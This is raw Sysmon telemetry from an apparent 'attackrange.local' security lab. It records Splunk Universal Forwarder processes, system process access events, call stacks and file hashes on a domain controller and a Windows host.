Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053508Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.723{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053507Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.723{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053506Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.723{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053505Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.723{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F7A4-60EB-D47D-00000000CF01}8876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053504Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.723{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053503Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.723{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F7A4-60EB-D47D-00000000CF01}8876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053502Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.709{466BC892-F7A4-60EB-D47D-00000000CF01}8876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001053501Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.577{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20D137223E2A00124206544E2C9087DA,SHA256=61299EF96D6EFB06546F13291253550D7AAE23F932AE22BD4670D0A0275A8E52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809858Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:52.263{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F61BEC561E77053976ECC088FA06515,SHA256=9DFEFE4496306492C6AAFABA60A77D769F76A63AD8DF6B0C72897B8F41E29EB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053500Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.377{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B0EB299F298E18754A759E27FD389680,SHA256=50B8CD5E02FE91688E366016E46C233485067D5EDFECF5E836F91C1EB74B1545,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053499Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.043{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F7A4-60EB-D37D-00000000CF01}4452C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053498Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.040{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053497Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.040{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053496Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.023{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053495Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.023{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F7A4-60EB-D37D-00000000CF01}4452C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053494Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.023{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053493Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.023{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F7A4-60EB-D37D-00000000CF01}4452C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053492Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:52.024{466BC892-F7A4-60EB-D37D-00000000CF01}4452C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001053521Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:53.725{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F896ABB6F77161FA38661D44A1499EA6,SHA256=BEC6D2F98ACBE5F89B8E79EE793CF21E0694177B6F20E19C674BCA38B2A0E39B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053520Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:53.712{466BC892-F7A5-60EB-D57D-00000000CF01}22528028C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053519Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:53.593{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CF45D0705EE92A5A2031AAEFC2AF2AC,SHA256=BD03625D4FC6D3025C9A4996E0A50079C8DC3A05A492DD5CE65AE190B8B88119,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809859Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:53.279{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=194D8969F17142E705228B24B2D3724B,SHA256=E861EE5002F720A794087BB5459BD86E0C3F1B35B5928863B948EDDC482A91CE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053518Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:53.408{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F7A5-60EB-D57D-00000000CF01}2252C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053517Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:53.408{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053516Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:53.408{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053515Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:53.408{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053514Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:53.408{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053513Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:53.408{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F7A5-60EB-D57D-00000000CF01}2252C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053512Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:53.392{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F7A5-60EB-D57D-00000000CF01}2252C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053511Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:53.393{466BC892-F7A5-60EB-D57D-00000000CF01}2252C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809860Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:54.295{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 